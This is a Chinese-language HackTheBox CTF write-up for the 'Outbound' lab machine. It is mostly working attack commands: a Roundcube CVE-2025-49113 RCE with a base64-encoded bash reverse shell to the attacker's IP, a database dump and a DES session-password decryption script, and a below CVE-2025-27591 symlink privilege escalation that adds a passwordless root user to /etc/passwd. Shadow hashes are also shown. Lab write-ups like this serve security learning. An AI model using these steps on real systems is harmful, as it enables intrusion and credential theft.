Outbound - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Outbound
• 10.10.11.77

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 21:02 JST
Nmap scan report for 10.10.11.77
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.92 seconds

80

需要加hosts：

10.10.11.77 outbound.htb mail.outbound.htb

是一个Roundcube Webmail：

Roundcube

给出的账号密码可以登录，Roundcube Webmail 1.6.10：

• GitHub - hakaioffsec/CVE-2025-49113-exploit: Proof of Concept demonstrating Remote Code Execution through insecure deserialization in Roundcube (CVE-2025-49113).
  https://github.com/hakaioffsec/CVE-2025-49113-exploit

shell

打到www-data:

/bin/bash -i >& /dev/tcp/10.10.14.22/4444 0>&1
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIyLzQ0NDQgMD4mMQo=

php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIyLzQ0NDQgMD4mMQo= | base64 -d | bash"

现在是在docker里，172.17.0.2

mysql to jacob

常规翻文件找到mysql认证信息以及des密钥：

www-data@mail:/var/www/html/roundcube/config$ cat config.inc.php


$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

mysql中可以获取到jacob用户session，其中包含des加密的认证信息：

mysql -u roundcube -pRCDBPass2025 -e 'use roundcube;select * from session;'

# session base64 decode，其中得到
password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW"
request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw"

根据搜索信息，找到解密方式：

• Decrypt password from session-vars
  https://www.roundcubeforum.net/index.php?topic=23399.0

也可以用别人做好的脚本,解出jacob密码：

$ python3 decrypt.py
[+] Decrypted password: 595mO8DmwGeD

decrypt.py

from base64 import b64decode
from Crypto.Cipher import DES3

# --- Inputs ---
key = b'rcmail-!24ByteDESkey*Str'  # 24-byte DES-EDE3 key

# Encrypted values (base64)
data = {
    'password': 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/',
    'auth_secret': 'DpYqv6maI9HxDL5GhcCd8JaQQW',
    'request_token': 'TIsOaABA1zHSXZOBpH6up5XFyayNRHaw'
}

def decrypt_des3_cbc(value, key):
    try:
        raw = b64decode(value)
        iv = raw[:8]
        cipher_text = raw[8:]
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        decrypted = cipher.decrypt(cipher_text)
        # Strip null bytes and last padding byte (mimics PHP rtrim + substr)
        decrypted = decrypted.rstrip(b'\x00')[:-1]
        return decrypted.decode(errors='replace')
    except Exception as e:
        return f"[ERROR] {e}"

# Decrypt all values
for k, v in data.items():
    result = decrypt_des3_cbc(v, key)
    print(f"[+] Decrypted {k}: {result}")

jacob to user

现在得到的密码还不能直接ssh登录宿主机，但可以在容器内切换到jacob，然后邮件中得到第二个密码：

jacob@mail:/var/mail$ cat jacob

gY4Wr3a1evp4

user flag

得到的新密码可以ssh登录外部宿主机：

提权信息

可以sudo运行特定的below命令，搜索可以发现below相关漏洞：

• oss-security - Below: World Writable Directory in /var/log/below Allows Local Privilege Escalation (CVE-2025-27591)
  https://www.openwall.com/lists/oss-security/2025/03/12/1

所以就是通过软链接来写文件，例如passwd文件创建新用户

提权 & root flag

整个过程快速操作

# 新建用户信息
echo "miao::0:0:miao:/root:/bin/bash" > /tmp/miao

# 删除原本日志文件
rm -rf /var/log/below/error_root.log

# 软链接
ln -s /etc/passwd /var/log/below/error_root.log

# 运行below
sudo /usr/bin/below

# 使用我们写入的用户信息覆盖软链接目标 passwd文件
cp /tmp/miao /var/log/below/error_root.log && su miao

shadow

root:$y$j9T$pYysWAL0lX2oSXNpBeXs81$yinIBrOJnhJj7viI.GiorNEgZFyIewJbS3qnjgXth16:20247:0:99999:7:::
mel:$y$j9T$5lR6zOH0Y8G/9ZDhogu2o0$9..CpGSBi06uovpNhGjqaMhPkc3Yw/svG9T3bSBoeS2:20247:0:99999:7:::
tyler:$y$j9T$t1QDz.OaqfevjpnRfQrRY.$jJwx2.H.OkiHiW8T0f.3A1qS5ZfA7.nmwU3TE1otfb.:20247:0:99999:7:::
jacob:$y$j9T$5JYw1WIG1mlmMdj6BrGVV/$yimg6djeBwfHAaDiOPoU0le/aURm6fRaG.DXzBkmmmA:20247:0:99999:7:::

参考资料

• GitHub - hakaioffsec/CVE-2025-49113-exploit: Proof of Concept demonstrating Remote Code Execution through insecure deserialization in Roundcube (CVE-2025-49113).
  https://github.com/hakaioffsec/CVE-2025-49113-exploit
• Decrypt password from session-vars
  https://www.roundcubeforum.net/index.php?topic=23399.0
• oss-security - Below: World Writable Directory in /var/log/below Allows Local Privilege Escalation (CVE-2025-27591)
  https://www.openwall.com/lists/oss-security/2025/03/12/1